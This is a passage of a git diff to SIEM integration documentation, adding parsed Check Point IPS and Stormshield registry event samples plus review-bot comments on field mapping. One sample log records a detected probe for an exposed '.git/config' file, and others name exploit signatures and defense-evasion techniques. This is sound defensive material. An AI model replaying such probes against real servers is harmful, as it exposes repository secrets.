layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} smartdefense_profile=XXXX_IPS_policy 
smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy ifname=eth5.996 loguid={0xc4f7efea,0x4a15abc5,0x796000a8,0x18edf12d} origin=3.4.5.6 originsicname=CN\\=DN-EXAMPLE,O\\=alfi.defo.ccse.nl sequencenum=12 version=5 capture_uuid={0x65a58fcb,0x1,0x4d1f8365,0xc5a8726d} description_url=02syslg_max_msg_len_tab_help.html dst=5.6.7.8 lastupdatetime=1705352059 log_id=2 policy=dn policy_time=1705348793 product=SmartDefense proto=17 rule_uid=b16110f0-fc9f-43b1-9f87-a8ad3f995237 session_id={0x65a58fc3,0x3,0x4d1f8365,0xc5a8726d} smartdefense_profile=XXXX_IPS_policy src=1.2.3.4", + "event": { + "code": "IPS", + "message": "Syslog Protocol Violation", + "outcome": "success" + }, + "action": { + "name": "detect", + "outcome": "success", + "outcome_reason": "Syslog Protocol Violation", + "properties": { + "loguid": "{0xc4f7efea,0x4a15abc5,0x796000a8,0x18edf12d}", + "observer_type": "SmartDefense", + "origin": "3.4.5.6", + "originsicname": "CN=DN-EXAMPLE,O=alfi.defo.ccse.nl", + "product": "SmartDefense", + "signature": [ + "CVE-1999-0063", + "CVE-1999-0381" + ] + }, + "target": "network-traffic" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 514 + }, + "log": { + "level": "Medium" + }, + "network": { + "direction": "outbound", + "transport": "udp" + }, + "observer": { + "ingress": { + "interface": { + "name": "eth5.996" + } + } + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "rule": { + "uuid": "b16110f0-fc9f-43b1-9f87-a8ad3f995237", + "version": "5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 57789 + } + } + + ``` + + === "CEF_tcp_accept.json" ```json 
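Review bot: the new `action.properties.signature` array is only checked against the two-value form `Signature=CVE-1999-0063, CVE-1999-0381`, where the expected event shows the IDs split on the comma and trimmed. Nothing covers a message with a single CVE (which should still yield a one-element array) or one without the `Signature` key, and the split relies on the extension value keeping its embedded space up to the following `cs4Label=` token. Add a single-value fixture so the field is an array for every shape of the input, not only this one.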
@@ -912,19 +1056,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "ip": "1.1.1.1" }, "host": { - "hostname": "2.2.2.2", "name": "2.2.2.2" }, - "log": { - "hostname": "2.2.2.2" - }, "network": { "transport": "icmp" }, "related": { - "hosts": [ - "2.2.2.2" - ], "ip": [ "1.1.1.1", "3.3.3.3" @@ -959,19 +1096,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "port": 443 }, "host": { - "hostname": "FOOBAR-HOST-01", "name": "FOOBAR-HOST-01" }, - "log": { - "hostname": "FOOBAR-HOST-01" - }, "network": { "transport": "tcp" }, "related": { - "hosts": [ - "FOOBAR-HOST-01" - ], "ip": [ "1.1.1.1", "2.2.2.2" @@ -1007,19 +1137,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "port": 58339 }, "host": { - "hostname": "FOOBAR-HOST-01", "name": "FOOBAR-HOST-01" }, - "log": { - "hostname": "FOOBAR-HOST-01" - }, "network": { "transport": "tcp" }, "related": { - "hosts": [ - "FOOBAR-HOST-01" - ], "ip": [ "1.1.1.1", "2.2.2.2" @@ -1344,6 +1467,7 @@ The following table lists the fields that are extracted, normalized under the EC |`action.properties.product` | `keyword` | | |`action.properties.reject_category` | `keyword` | | |`action.properties.rule_name` | `keyword` | | +|`action.properties.signature` | `array` | | |`action.properties.source_key_id` | `keyword` | | |`action.properties.subproduct` | `keyword` | | |`action.properties.vpn_feature_name` | `keyword` | | 
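Review bot: the three sample hunks at -912, -959 and -1007 drop `host.hostname`, `log.hostname` and the `related.hosts` entry while leaving `host.name` with the identical value. In the first of them that value is the address `2.2.2.2`, which after this change appears in no `related.*` array at all (`related.ip` still lists only `1.1.1.1` and `3.3.3.3`); either keep it in `related.hosts` or, since it is an IP literal, add it to `related.ip`, and confirm no built-in rule for this integration keys on `related.hosts` or `log.hostname` before those fields leave the documented output. The `action.properties.signature` row added to the field table in the last hunk matches the `CEF_syslog.json` sample.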
@@ -1358,10 +1482,11 @@ The following table lists the fields that are extracted, normalized under the EC |`destination.size_in_char` | `number` | | |`destination.user.name` | `keyword` | Short name or login of the user. | |`event.code` | `keyword` | Identification code for this event. | -|`host.hostname` | `keyword` | Hostname of the host. | |`host.name` | `keyword` | Name of the host. | |`http.request.method` | `keyword` | HTTP request method. | +|`log.level` | `keyword` | Log level of the log event. | |`network.direction` | `keyword` | Direction of the network traffic. | +|`network.forwarded_ip` | `ip` | Host IP address when the source IP address is the proxy. | |`network.protocol` | `keyword` | Application protocol name. | |`network.transport` | `keyword` | Protocol Name corresponding to the field `iana_number`. | |`observer.egress.zone` | `keyword` | Observer Egress zone | diff --git a/_shared_content/operations_center/integrations/generated/f0a10c21-37d1-419f-8671-77903dc8de69_sample.md b/_shared_content/operations_center/integrations/generated/f0a10c21-37d1-419f-8671-77903dc8de69_sample.md index 51fb287215..a75f25ed98 100644 --- a/_shared_content/operations_center/integrations/generated/f0a10c21-37d1-419f-8671-77903dc8de69_sample.md +++ b/_shared_content/operations_center/integrations/generated/f0a10c21-37d1-419f-8671-77903dc8de69_sample.md 
@@ -106,6 +106,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "CEF_proxy_src" + + ``` + 0|Check Point|SmartDefense|Check Point|IPS|Web Server Exposed Git Repository Information Disclosure|Very-High|act=Detect cp_severity=Very-High cnt=1 cs1Label=Threat Prevention Rule Name cs2Label=Protection ID cs2=asm_dynamic_prop_GIT_EXPOSED cs3Label=Protection Type cs3=IPS cs4Label=Protection Name cs4=Web Server Exposed Git Repository Information Disclosure cs4Label=Threat Prevention Rule ID cs4={115C1043-DF8A-48D4-96CB-0200C1F1499A} deviceDirection=1 flexNumber1Label=Confidence flexNumber1=5 flexNumber2Label=Performance Impact flexNumber2=3 flexString2Label=Attack Information flexString2=Web Server Exposed Git Repository Information Disclosure in=52 msg=Web Server Enforcement Violation out=0 request=http://9.10.11.12/.git/config requestMethod=GET rt=1722861810000 spt=51451 dpt=80 cs4Label=Threat Prevention Rule ID cs4={115C1043-DF8A-48D4-96CB-0200C1F1499A} cs4={6E7AA7B4-FD2A-40A3-ACDE-AC1182F1120F} cs1Label=Threat Prevention Rule Name cs1=Antibot + TE EAP layer_name=IPS layer_uuid={1DA55D35-9A2B-4141-A512-150DC635378B} layer_uuid={368D4C86-B4FD-4EF9-9AED-E58C4C0DEE7F} smartdefense_profile=EAP_Prevent smartdefense_profile=Profil_EAP_Anti-Bot_TE ifname=bond1.103 loguid={0x611c9f51,0x8c73c182,0xe99e964e,0x2addea20} origin=192.168.203.80 originsicname=CN\=MyGW,O\=MyDomain_Server.checkpoint.com.s6t98x sequencenum=85 version=5 description_url=GIT_EXPOSED_help.html dst=1.2.3.4 lastupdatetime=1722861871 log_id=2 policy=2016-12_Prolix_Migration-FW policy_time=1722591913 product=SmartDefense proto=6 proxy_src_ip=5.6.7.8 reject_id_kid=66b0c8f2-2-a5f697e5-ce3758d7 rule_uid=e70129a9-2a18-4075-8042-b85f0b601ca4 ser_agent_kid=Safari 4.0 session_id={0x66b06cef,0x11,0x9b1c4c53,0xdf840ae7} smartdefense_profile=EAP_Prevent src=5.6.7.8 tags=Vendor_Git Product_Web_Servers Threat_Year_2015 Threat_Prevalence_True Protection_Type_Vulnerability 
Product_Prevalence_Common Tuning_Non_Configurable Protocol_HTTP Direction_SERVER + ``` + + + === "CEF_reject" ``` 
@@ -114,6 +122,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "CEF_syslog" + + ``` + 0|Check Point|SmartDefense|Check Point|IPS|Syslog Message Length Enforcement|Medium|act=Detect cp_severity=Medium cnt=53 cs1Label=Threat Prevention Rule Name cs2Label=Protection ID cs2=02syslg_max_msg_len_tab cs3Label=Protection Type cs3=IPS cs4Label=Protection Name cs4=Syslog Message Length Enforcement cs4Label=Threat Prevention Rule ID cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} deviceDirection=1 flexNumber1Label=Confidence flexNumber1=1 flexNumber2Label=Performance Impact flexNumber2=2 flexString2Label=Attack Information flexString2=phpFileManager cmd Parameter Command Execution in=0 msg=Syslog Protocol Violation out=0 rt=1705349059000 spt=57789 dpt=514 Signature=CVE-1999-0063, CVE-1999-0381 cs4Label=Threat Prevention Rule ID cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs1Label=Threat Prevention Rule Name layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy 
smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy ifname=eth5.996 loguid={0xc4f7efea,0x4a15abc5,0x796000a8,0x18edf12d} origin=3.4.5.6 originsicname=CN\=DN-EXAMPLE,O\=alfi.defo.ccse.nl sequencenum=12 version=5 capture_uuid={0x65a58fcb,0x1,0x4d1f8365,0xc5a8726d} description_url=02syslg_max_msg_len_tab_help.html dst=5.6.7.8 lastupdatetime=1705352059 log_id=2 policy=dn policy_time=1705348793 product=SmartDefense proto=17 rule_uid=b16110f0-fc9f-43b1-9f87-a8ad3f995237 session_id={0x65a58fc3,0x3,0x4d1f8365,0xc5a8726d} smartdefense_profile=XXXX_IPS_policy src=1.2.3.4 + ``` + + + === "CEF_tcp_accept" ``` diff --git a/_shared_content/operations_center/integrations/generated/f0f95532-9928-4cde-a399-ddd992d48472.md b/_shared_content/operations_center/integrations/generated/f0f95532-9928-4cde-a399-ddd992d48472.md index 32d9a53c1f..1c2b9d8e7b 100644 --- a/_shared_content/operations_center/integrations/generated/f0f95532-9928-4cde-a399-ddd992d48472.md +++ b/_shared_content/operations_center/integrations/generated/f0f95532-9928-4cde-a399-ddd992d48472.md 
@@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_transaction_blocked.json" diff --git a/_shared_content/operations_center/integrations/generated/f570dd30-854b-4a22-9c2d-e2cfa46bf0e5.md b/_shared_content/operations_center/integrations/generated/f570dd30-854b-4a22-9c2d-e2cfa46bf0e5.md index d7cf4e845e..f9f280d3a9 100644 --- a/_shared_content/operations_center/integrations/generated/f570dd30-854b-4a22-9c2d-e2cfa46bf0e5.md +++ b/_shared_content/operations_center/integrations/generated/f570dd30-854b-4a22-9c2d-e2cfa46bf0e5.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_blocked_file.json" diff --git a/_shared_content/operations_center/integrations/generated/f5e6cf5e-bd9f-4caf-9098-fe4a9e0aeaa0.md b/_shared_content/operations_center/integrations/generated/f5e6cf5e-bd9f-4caf-9098-fe4a9e0aeaa0.md index e2a54a30b7..f528c3541e 100644 --- a/_shared_content/operations_center/integrations/generated/f5e6cf5e-bd9f-4caf-9098-fe4a9e0aeaa0.md +++ b/_shared_content/operations_center/integrations/generated/f5e6cf5e-bd9f-4caf-9098-fe4a9e0aeaa0.md 
@@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_type_1000.json" 
@@ -466,6 +466,103 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_type_104_2.json" + + ```json + + { + "message": "{\"Version\": 1, \"Type\": 104, \"TypeComputedMap\": \"RegistryKeyRead\", \"Severity\": 2, \"ServerReserved\": 0, \"Attributes\": 2, \"AttributesComputedBitMap\": [\"Protection\"], \"EventGuid\": \"{4C8EFA24-0021-49CA-B9F7-CF5A7BF57173}\", \"GenerateIncident\": true, \"Timestamp\": \"2024-07-09T12:08:54.9660242+02:00\", \"TimestampRaw\": 133649933349660242, \"SpecificData\": {\"SourceProcess\": {\"PID\": 3948, \"ProcessGuid\": \"{93158E40-E93F-46CE-BCE0-3FC359B07B75}\", \"ProcessImageName\": \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\4.18.24050.7-0\\\\MsMpEng.exe\", \"VolumeZone\": 1, \"VolumeZoneComputedBitMap\": [\"Operating system\"], \"ProcessCommandLine\": \"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\4.18.24050.7-0\\\\MsMpEng.exe\\\"\", \"User\": \"S-1-5-21-2222222-33333333-44444444-555\", \"UserNameLookup\": \"JOHNDOE\", \"UserDomainLookup\": \"TEST\", \"IntegrityLevel\": \"S-1-16-16384\", \"IntegrityLevelNameLookup\": \"Niveau obligatoire syst\\u00e8me\", \"IntegrityLevelDomainLookup\": \"\\u00c9tiquette obligatoire\", \"SessionID\": 0, \"HashMd5\": \"4A4D6E95B693256BCD6E90FDC077194A\", \"HashSha1\": \"2E52FBE255C0CB6C6B27EEE8C28ACAFAA42DB60E\", \"HashSha256\": \"08D69BDE42AEEA0F0ECBF16A84BF74AF47C0EA6C0ADA6DDBD40CDC7F5C2930ED\", \"IsProtectedOrCritical\": true, \"CertificateSignatureState\": 1, \"CertificateSignatureStateComputedMap\": \"SignatureStateTrusted\", \"Certificates\": [{\"Algorithm\": \"SHA256\", \"IssuerCN\": \"Microsoft Windows Production PCA 2011\", \"SubjectCN\": \"Microsoft Windows Publisher\", \"SigningTime\": \"2024-05-11T03:15:15.5120000+02:00\", \"ValidityStart\": \"2024-02-08T21:22:45.0000000+02:00\", \"ValidityEnd\": \"2025-02-07T21:22:45.0000000+02:00\"}], \"ProcessStartTime\": \"2024-07-09T10:03:54.4154623+02:00\", 
\"ProcessStartTimeRaw\": 133649858344154623}, \"Action\": {\"PolicyGuid\": \"{2042076D-A879-4913-A2C7-E94A9ECE8D79}\", \"PolicyVersion\": 14, \"RuleGuid\": \"{F676C8C4-D8FD-4ED2-89FB-C949EA33951C}\", \"BaseRuleGuid\": \"{508448D3-1872-416D-99D9-A3F64AE24C48}\", \"IdentifierGuid\": \"{6F1EAB4E-60E5-4DA2-8509-768988375E47}\", \"Blocked\": false, \"RequestMoveToQuarantine\": false, \"UserDecision\": false, \"SourceProcessKilled\": false, \"RuleTags\": [\"T1562.001\"]}, \"Path\": \"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\TemporaryPaths\", \"InformationClass\": 4, \"InformationClassComputedMap\": \"KeyCachedInformation\"}, \"AdditionalData\": {\"AgentAddresses\": [\"1.2.3.4\"], \"AgentGroupGuid\": \"{1B24AC36-5218-4F44-A374-80D86475E325}\", \"AgentGroupName\": \"Demo\", \"AgentGuid\": \"{6CA7D1BE-7359-426D-B5B1-D9E742DF69A6}\", \"AgentName\": \"WIN10-A\", \"AttackCVEId\": null, \"AttackMitreTacticId\": [\"TA0005\"], \"AttackMitreTacticName\": [\"Defense Evasion\"], \"AttackMitreTechnicId\": [\"T1562\", \"T1562.001\"], \"AttackMitreTechnicName\": [\"Impair Defenses\", \"Disable or Modify Tools\"], \"AttackSESId\": null, \"AttackTriggerCondition\": \"An untrusted process attempts to add bypass into Windows Defender.\", \"CategoryName\": \"Registry\", \"IncidentGuid\": \"{CE926A32-4461-47C0-BDE8-43C1493E7DF0}\", \"Message\": \"The 'MsMpEng.exe' process read the registry key 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\TemporaryPaths'\", \"PolicyName\": \"Demo - Protect policy\", \"SeverityName\": \"Critical\"}}", + "event": { + "category": [ + "registry" + ], + "code": "RegistryKeyRead", + "reason": "The 'MsMpEng.exe' process read the registry key 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\TemporaryPaths'", + "severity": 2, + "type": [ + "access" + ] + }, + "@timestamp": "2024-07-09T10:08:54.966024Z", + "process": { + "command_line": 
"\"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.24050.7-0\\MsMpEng.exe\"", + "executable": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.24050.7-0\\MsMpEng.exe", + "hash": { + "md5": "4A4D6E95B693256BCD6E90FDC077194A", + "sha1": "2E52FBE255C0CB6C6B27EEE8C28ACAFAA42DB60E", + "sha256": "08D69BDE42AEEA0F0ECBF16A84BF74AF47C0EA6C0ADA6DDBD40CDC7F5C2930ED" + }, + "name": "MsMpEng.exe", + "pid": 3948, + "start": "2024-07-09T08:03:54.415462Z", + "user": { + "id": "S-1-5-21-2222222-33333333-44444444-555", + "name": "JOHNDOE" + } + }, + "registry": { + "hive": "HKEY_LOCAL_MACHINE", + "key": "SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\TemporaryPaths", + "path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\TemporaryPaths" + }, + "related": { + "hash": [ + "08D69BDE42AEEA0F0ECBF16A84BF74AF47C0EA6C0ADA6DDBD40CDC7F5C2930ED", + "2E52FBE255C0CB6C6B27EEE8C28ACAFAA42DB60E", + "4A4D6E95B693256BCD6E90FDC077194A" + ] + }, + "rule": { + "ruleset": "Demo - Protect policy", + "uuid": "F676C8C4-D8FD-4ED2-89FB-C949EA33951C" + }, + "stormshield": { + "ses": { + "action": { + "blocked": false, + "user_decision": false + }, + "categoryname": "Registry", + "incident": { + "id": "{CE926A32-4461-47C0-BDE8-43C1493E7DF0}" + }, + "level": "Critical", + "process": { + "user": { + "domain": "TEST" + } + }, + "source_process": { + "killed": false + }, + "type": "104" + } + }, + "threat": { + "tactic": { + "id": [ + "TA0005" + ], + "name": [ + "Defense Evasion" + ] + }, + "technique": { + "id": [ + "T1562", + "T1562.001" + ], + "name": [ + "Disable or Modify Tools", + "Impair Defenses" + ] + } + } + } + + ``` + + === "test_type_109.json" ```json 
@@ -729,9 +826,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "registry": { + "data": { + "type": "REG_SZ" + }, "hive": "HKEY_CURRENT_USER", "key": "SOFTWARE\\TEST_ADE", - "path": "HKEY_CURRENT_USER\\SOFTWARE\\TEST_ADE" + "path": "HKEY_CURRENT_USER\\SOFTWARE\\TEST_ADE", + "value": "Valeur_String" }, "related": { "hash": [ 
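Review bot: the `test_type_109` hunk adds `registry.data.type: "REG_SZ"` and `registry.value: "Valeur_String"` but no `registry.data.strings`, while the `test_type_115` hunk later in this patch populates `registry.data.strings: ["lala"]` for the same `REG_SZ` type and value name. If the raw type 109 sample carries `ValueData`, it should be mapped to `registry.data.strings` here too; if it does not, a short note in the integration doc explaining which event types carry value data would save analysts from writing rules on a field that is only sometimes present.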
@@ -765,6 +866,99 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_type_113_1.json" + + ```json + + { + "message": "{\"Version\":1,\"Type\":113,\"TypeComputedMap\":\"RegistryValueCreate\",\"Severity\":5,\"ServerReserved\":9,\"Attributes\":8,\"AttributesComputedBitMap\":[\"Audit\"],\"EventGuid\":\"{E8B35E85-838F-44E5-B7AB-7635E9C81ECB}\",\"GenerateIncident\":false,\"Timestamp\":\"2024-03-22T12:39:27.6422102+01:00\",\"TimestampRaw\":133555811676422102,\"SpecificData\":{\"SourceProcess\":{\"PID\":1196,\"ProcessGuid\":\"{B0E2F52D-8C18-4DF8-8E73-470BB4E5D373}\",\"ProcessImageName\":\"C:\\\\Windows\\\\regedit.exe\",\"VolumeZone\":1,\"VolumeZoneComputedBitMap\":[\"Operatingsystem\"],\"ProcessCommandLine\":\"\\\"C:\\\\WINDOWS\\\\regedit.exe\\\"\",\"User\":\"S-1-5-21-2222222-33333333-44444444-555\",\"UserNameLookup\":\"JOHNDOE\",\"UserDomainLookup\":\"TEST\",\"IntegrityLevel\":\"S-1-16-8192\",\"IntegrityLevelNameLookup\":\"MediumMandatoryLevel\",\"IntegrityLevelDomainLookup\":\"MandatoryLabel\",\"SessionID\":2,\"HashMd5\":\"999A30979F6195BF562068639FFC4426\",\"HashSha1\":\"D4F2663AABC03478975382B3C69F24B3C6BD2AA9\",\"HashSha256\":\"92F24FED2BA2927173AAD58981F6E0643C6B89815B117E8A7C4A0988AC918170\",\"IsProtectedOrCritical\":false,\"CertificateSignatureState\":1,\"CertificateSignatureStateComputedMap\":\"SignatureStateTrusted\",\"Certificates\":[{\"Algorithm\":\"SHA256\",\"IssuerCN\":\"MicrosoftWindowsProductionPCA2011\",\"SubjectCN\":\"MicrosoftWindows\",\"SigningTime\":\"2023-01-18T02:58:33.2360000+01:00\",\"ValidityStart\":\"2022-05-05T20:23:14.0000000+01:00\",\"ValidityEnd\":\"2023-05-04T20:23:14.0000000+01:00\"}],\"ProcessStartTime\":\"2023-03-06T16:04:21.8793902+01:00\",\"ProcessStartTimeRaw\":133225886618793902},\"Action\":{\"PolicyGuid\":\"{BF0D5FEE-FF2A-4E6B-97DA-A1FC246FE845}\",\"PolicyVersion\":4,\"RuleGuid\":\"{4CEEDD7A-875D-4C7E-9ABD-A710BD3DD0C0}\",\"BaseRuleGuid\":\"{4CEEDD7A-875D-4C7E-9ABD-A710BD3DD0BF}\",\"Iden
tifierGuid\":\"{5C079068-7641-4C9A-8600-BBDC93FBBCDD}\",\"Blocked\":false,\"UserDecision\":false,\"SourceProcessKilled\":false},\"Path\":\"HKEY_LOCAL_MACHINE\\\\BCD00000000\\\\Objects\\\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\\\Elements\\\\25000004\",\"ValueName\":\"Element\",\"ValueDataType\":3,\"ValueDataTypeComputedMap\":\"REG_BINARY\",\"ValueData\":[0,0,0,0,0,0,0,0]},\"AdditionalData\":{\"AgentAddresses\":[],\"AgentGroupGuid\":\"{61B578F4-289D-4B97-A331-DDDCB80C6427}\",\"AgentGroupName\":\"Desktop\",\"AgentGuid\":\"{6EF8564D-941A-4377-80FD-78CD3DFEB269}\",\"AgentName\":\"DST-001\",\"CategoryName\":\"Registry\",\"IncidentGuid\":null,\"Message\":\"The'svchost.exe'processcreatedtheregistryvalue'Element'\",\"PolicyName\":\"Stormshield-Mediumpolicy-External\",\"SeverityName\":\"Notice\"}}", + "event": { + "category": [ + "registry" + ], + "code": "RegistryValueCreate", + "reason": "The'svchost.exe'processcreatedtheregistryvalue'Element'", + "severity": 5, + "type": [ + "creation" + ] + }, + "@timestamp": "2024-03-22T11:39:27.642210Z", + "host": { + "ip": [], + "name": "DST-001" + }, + "process": { + "command_line": "\"C:\\WINDOWS\\regedit.exe\"", + "executable": "C:\\Windows\\regedit.exe", + "hash": { + "md5": "999A30979F6195BF562068639FFC4426", + "sha1": "D4F2663AABC03478975382B3C69F24B3C6BD2AA9", + "sha256": "92F24FED2BA2927173AAD58981F6E0643C6B89815B117E8A7C4A0988AC918170" + }, + "name": "regedit.exe", + "pid": 1196, + "start": "2023-03-06T15:04:21.879390Z", + "user": { + "id": "S-1-5-21-2222222-33333333-44444444-555", + "name": "JOHNDOE" + } + }, + "registry": { + "data": { + "bytes": [ + "0", + "0", + "0", + "0", + "0", + "0", + "0", + "0" + ], + "type": "REG_BINARY" + }, + "hive": "HKEY_LOCAL_MACHINE", + "key": "BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements\\25000004", + "path": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements\\25000004", + "value": "Element" + }, + "related": { + "hash": [ + 
"92F24FED2BA2927173AAD58981F6E0643C6B89815B117E8A7C4A0988AC918170", + "999A30979F6195BF562068639FFC4426", + "D4F2663AABC03478975382B3C69F24B3C6BD2AA9" + ], + "ip": [] + }, + "rule": { + "ruleset": "Stormshield-Mediumpolicy-External", + "uuid": "4CEEDD7A-875D-4C7E-9ABD-A710BD3DD0C0" + }, + "stormshield": { + "ses": { + "action": { + "blocked": false, + "user_decision": false + }, + "categoryname": "Registry", + "level": "Notice", + "process": { + "user": { + "domain": "TEST" + } + }, + "source_process": { + "killed": false + }, + "type": "113" + } + } + } + + ``` + + === "test_type_114.json" ```json 
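Review bot: in `test_type_113_1.json`, `registry.data.bytes` is emitted as an array of decimal strings (`["0", "0", ...]`), but the field table added later in this patch describes it as "Original bytes written with base64 encoding", which is also the ECS definition of that field. The raw `ValueData` byte array `[0,0,0,0,0,0,0,0]` should be base64-encoded into a single string (`"AAAAAAAAAAA="` for these eight zero bytes) so the field matches its declared type and rules written against ECS semantics work. Also consider omitting `host.ip: []` and `related.ip: []` when `AgentAddresses` is empty rather than emitting empty arrays.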
@@ -835,6 +1029,103 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_type_114_2.json" + + ```json + + { + "message": "{\"Version\": 1, \"Type\": 114, \"TypeComputedMap\": \"RegistryValueRead\", \"Severity\": 2, \"ServerReserved\": 0, \"Attributes\": 2, \"AttributesComputedBitMap\": [\"Protection\"], \"EventGuid\": \"{002A9967-5EF2-40CF-911D-7DBA518843A9}\", \"GenerateIncident\": true, \"Timestamp\": \"2024-07-09T12:33:11.2491955+02:00\", \"TimestampRaw\": 133649947912491955, \"SpecificData\": {\"SourceProcess\": {\"PID\": 3948, \"ProcessGuid\": \"{9BC994D7-904B-4C9C-8DC0-A03A36F36276}\", \"ProcessImageName\": \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\4.18.24050.7-0\\\\MsMpEng.exe\", \"VolumeZone\": 1, \"VolumeZoneComputedBitMap\": [\"Operating system\"], \"ProcessCommandLine\": \"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\4.18.24050.7-0\\\\MsMpEng.exe\\\"\", \"User\": \"S-1-5-21-2222222-33333333-44444444-555\", \"UserNameLookup\": \"JOHNDOE\", \"UserDomainLookup\": \"TEST\", \"IntegrityLevel\": \"S-1-16-16384\", \"IntegrityLevelNameLookup\": \"Niveau obligatoire syst\\u00e8me\", \"IntegrityLevelDomainLookup\": \"\\u00c9tiquette obligatoire\", \"SessionID\": 0, \"HashMd5\": \"4A4D6E95B693256BCD6E90FDC077194A\", 